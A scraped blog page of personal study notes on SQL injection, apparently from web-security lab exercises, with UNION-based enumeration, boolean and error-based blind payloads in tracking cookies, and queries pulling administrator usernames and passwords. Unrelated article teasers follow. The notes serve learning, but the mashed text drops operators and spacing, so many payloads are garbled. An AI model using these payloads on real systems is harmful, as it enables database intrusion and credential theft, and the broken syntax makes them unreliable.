WEB PENETRATION TESTING-- Admin + is + trator

发布时间:2026/10/7 21:27:02

WEB PENETRATION TESTING-- Admin + is + trator SQLiCtrlu : encode’ 11–PS:After the ’ have a SPACEBut before “–”,have no SPACEUNION-based SQL Injection(1) Determine the number of columnsorder by1✅正常 order by2✅正常 order by3❌报错 OR UNION SELECT NULL ❌报错 UNION SELECT NULL,NULL ✅正常 UNION SELECT NULL,NULL,NULL ❌报错(2) Determine the data types of the columns (must from a table)just know if it’s str# Oracle must have the FROM,so its easy to use FROM dualUNION SELECT NULL,NULL FROM DUAL UNION SELECTa,NULL FROM DUAL UNION SELECT NULL,aFROM DUAL UNION SELECTa,aFROM DUAL#if NULL,a, you could:selectNULL,username||~||password fromusers(3) Output the version of the database数据库版本查询语句OracleSELECT banner FROM v$versionOracleSELECT version FROM v$instanceMicrosoftSELECT versionPostgreSQLSELECT version()MySQLSELECT version# Must match the number of columnUNION SELECT banner, NULL fromv$version--# v$version store version info(4) Output TABLE NAMEUSER_STATS数据库查询所有表查询指定表的列OracleSELECT * FROM all_tablesSELECT * FROM all_tab_columns WHERE table_name TABLE-NAME-HEREMicrosoftSELECT * FROM information_schema.tablesSELECT * FROM information_schema.columns WHERE table_name TABLE-NAME-HEREPostgreSQLSELECT * FROM information_schema.tablesSELECT * FROM information_schema.columns WHERE table_name TABLE-NAME-HEREMySQLSELECT * FROM information_schema.tablesSELECT * FROM information_schema.columns WHERE table_name TABLE-NAME-HEREGoogle:information_schema.tables postgresql to find the “table_name”SELECT*FROMinformation_schema.tablesUNIONSELECTtable_name,NULLFROMinformation_schema.tablesSearch to find the table: “users_vzoxvb”(5) Output COLUMN NAME in tableGoogle:information_schema.columns postgresql to find “column_name” fieldSearch “Table_name” in Response,and use table_name replace the *SELECT*FROMinformation_schema.columnsWHEREtable_nameTABLE-NAME-HEREUNIONSELECTcolumns,NULLFROMinformation_schema.columnsWHEREtable_nametable_name #Typethe users_vzoxvb intotable_namefieldUNIONSELECTcolumn_name,NULLFROMinformation_schema.columnsWHEREtable_nameusers_vzoxvbto Get “username_ggtjng” “password_ccixiu”SELECT COLUMN_NAME FROM all_tab_columns WHERE table_name ‘USERS_DTFKLB’(6) Output Username and PWDUNIONselectusername_ggtjng,password_ccixiu from users_vzoxvbto Rearch “Admin” or Normal UserBlind SQL Injection ResponseDon’t like Union injection that show some data,blind always response “200”.Time-based Blind SQLi could generate cmd which meet specific conditions to dalay the database.(1)Confirm SQLi vulnerable# use the trackingIdselecttracking-idfromtracking-tablewheretrackingIdRvLfBu6s9EZRlVYNCookie: TrackingIdjxuJ6305dQ35cEPz and 11-- - Welcome Cookie: TrackingIdjxuJ6305dQ35cEPzand10-- - No Welcome(2) Confirm that we have a users table# If users table is exist,will output TestIfExistSELECTTestIfExistFROMusers;# So we could test if the users is existingCookie: TrackingIdjxuJ6305dQ35cEPz and (select x from users LIMIT 1)x-- # Confitm the user name is administrator (SELECT a FROM users WHERE usernameadministrator)a Cookie: TrackingIdjxuJ6305dQ35cEPzand(SELECTaFROMusersWHEREusernameadministrator)a--;(3)Determine PWDDetermine the length of PWD,Just use the IntruderCookie:TrackingIdjxuJ6305dQ35cEPz and (SELECT a FROM users WHERE usernameadministratorAND LENGTH(password)20)a--;Then foreach the charCookie:TrackingIdjxuJ6305dQ35cEPz and (SELECT SUBSTRING(password,1,1) FROM users WHERE usernameadministrator)e--Blind SQL Injection ErrorProve that parameter is vulnerable||is to connect str,must use theinstead ofCookie:TrackingIdhzd4cBI1UR0iMgKf||(select from dual)||Confirm users table and administrator# Determine the tableCookie: TrackingIdgiUpOQnNBkR52ME7||(select from users where rownum1)||# rowmun1 is only to retrieve one line# Determine the adminitratorCookie: TrackingIdgiUpOQnNBkR52ME7||(select from users where usernameadminitrator)||(3)Determine the PWDCuz we can’t see the page that have right CMD,so we let the right CMD behavior ERROR,so we can judge the right CMD# If 语句 is right ,we could find the ERROR to judge it is correct.||(SELECT CASE WHEN (语句) THEN TO_CHAR(1/0) ELSE END FROM dual)||# The Real Condition:# Determine Length : SELECT CASE WHEN (LENGTH(password)10)Cookie: TrackingIdgiUpOQnNBkR52ME7||(SELECT CASE WHEN (LENGTH(password)10) THEN TO_CHAR(1/0) ELSE END FROM users WHERE usernameadministrator)||# Determine Char : Notify adminitrator and AND inside the (..... AND substr(password,1,1)a)||(SELECT CASE WHEN (11) THEN TO_CHAR(1/0) ELSE END FROM users WHERE usernameadministrator AND substr(password,1,1)a)||XSS跨站脚本攻击
延伸阅读

更多相关文章

2026/10/7 21:27:02

【专知智库】交易标的不标准,是流动性最大的敌人

交易标的不标准,是流动性最大的敌人尊敬的交易机构负责人、运营团队:您一定深有体会:数据交易所挂牌的数据产品不少,但真正成交的少。知识产权交易平台登记的专利、软著很多,但真正能交易、能定价、能交割的少。 买方说…

2026/10/7 21:27:02

[MoeCTF 2025]mazegame_WP

通过搜索算法解出最优路径的题目平台:MoeCTF 方向:逆向 知识点:BFS、DFS 难度:入门一、信息获取题目意图就是让输入字符串,走迷宫 二、分析从下面分析发现: n0x37为行数(我更名为row&#xff09…

2026/10/7 21:27:02

linux下删除本目录下除了“XXX”目录外的命令

Linux下经常会出现有文件的名称变为了特殊字符或乱码,导致无法删除的情况,这个时候我们可以使用一些方法删除,比如:在当前目录下,删除除了 XXX 目录以外的所有内容(包括名称乱码的文件)&#xf…

2026/10/7 22:17:08

caveman:编码代理的本地代理层,实现token统计与请求转换

1. 项目缘起:为什么我要做“caveman”这个编码代理“caveman”这个名字听起来有点糙,但它要解决的问题一点都不糙。简单说,caveman 是一个面向编码代理(coding agents)的本地代理层,核心工作是在代理工具和…

2026/10/7 22:17:08

LLMProbe:面向大语言模型上游链路的健康监测系统

1. 项目概述:这不是又一个LLM测试工具,而是一套面向模型上游的“健康监测系统”你有没有遇到过这样的情况:刚部署好的大语言模型API服务,在压测时响应延迟突然飙升到3秒以上;或者在批量推理时,明明输入长度…

2026/10/7 22:17:08

Agent-Reach:面向多平台API的轻量级CLI任务编排工具

1. 项目概述:Agent-Reach 是什么,它解决的是哪类真实问题Agent-Reach 不是一个通用型工具或开源库的官方名称,而是一个在开发者社区中自发形成的、带有明确功能指向性的项目代号——它指代一类面向多平台代理调用与任务分发的轻量级命令行中枢…

2026/10/7 22:12:08

SSM在线相机商城:JavaWeb核心框架整合实战指南

如果你正在做JavaWeb方向的毕业设计,或者刚把SSM框架学完、想找一套完整系统动手练一练,基于SSM在线相机商城这个选题值得你认真对待。这套技术组合是java ssm jsp jquery mysql,项目本身并不算新,但它把Spring、SpringMVC、M…

2026/10/5 6:32:56

Jev+Agent接管浏览器:browser-use实战与jev-ultrafast性能优化

1. 从“Jev”说起:为什么我要把Agent接进浏览器“Jev”这个词最近在圈子里出现的频率越来越高,很多人第一次听到会以为是某个新模型的名字,其实它更像是一种思路——把Jev模型的能力当作底座,通过Agent的方式去接管浏览器&#xf…

2026/10/7 8:18:33

多智能体集群实战:DeepAgents编排、MCP与A2A协议及Skills体系

1. 从"单兵作战"到"集群协同":多智能体编排到底在解决什么问题如果你最近在折腾 Agent 相关的东西,大概率会有一种感觉:单个 Agent 能做的事情,其实很快就摸到天花板了。你给它一个提示词,挂几个工…

2026/10/6 17:46:51

无源低通滤波器设计实战:从RC到LC,手把手教你避开那些坑

/* MD / 富文本中的 .toc(含博客园搬家等嵌套结构);.toc-box 在侧栏,不受影响 */#content_views .toc,/* 编辑器常在目录前后插入空 p(:empty 仍占 20px),一并去掉避免顶空隙 */#content_views.markdown_views > p:empty:has(+ .toc),#content_views.markdown_views …

2026/10/7 1:05:03

ESP32免重刷固件:浏览器直接修改NVS键值实现WiFi配置更新

/* MD / 富文本中的 .toc(含博客园搬家等嵌套结构);.toc-box 在侧栏,不受影响 */#content_views .toc,/* 编辑器常在目录前后插入空 p(:empty 仍占 20px),一并去掉避免顶空隙 */#content_views.markdown_views > p:empty:has(+ .toc),#content_views.markdown_views …

2026/10/7 1:05:03

SAP HANA查询结果导出CSV:避开乱码、性能与权限的实用指南

/* MD / 富文本中的 .toc(含博客园搬家等嵌套结构);.toc-box 在侧栏,不受影响 */#content_views .toc,/* 编辑器常在目录前后插入空 p(:empty 仍占 20px),一并去掉避免顶空隙 */#content_views.markdown_views > p:empty:has(+ .toc),#content_views.markdown_views …

2026/10/7 1:05:03

数字后端Placement阶段Density与Congestion控制实战

/* MD / 富文本中的 .toc(含博客园搬家等嵌套结构);.toc-box 在侧栏,不受影响 */#content_views .toc,/* 编辑器常在目录前后插入空 p(:empty 仍占 20px),一并去掉避免顶空隙 */#content_views.markdown_views > p:empty:has(+ .toc),#content_views.markdown_views …

还想了解更多?直接咨询顾问

免费诊断 + 免费方案 + 透明报价。

全国咨询热线400-8866-253
免费获取方案
☎咨询二维码 ☎ ↑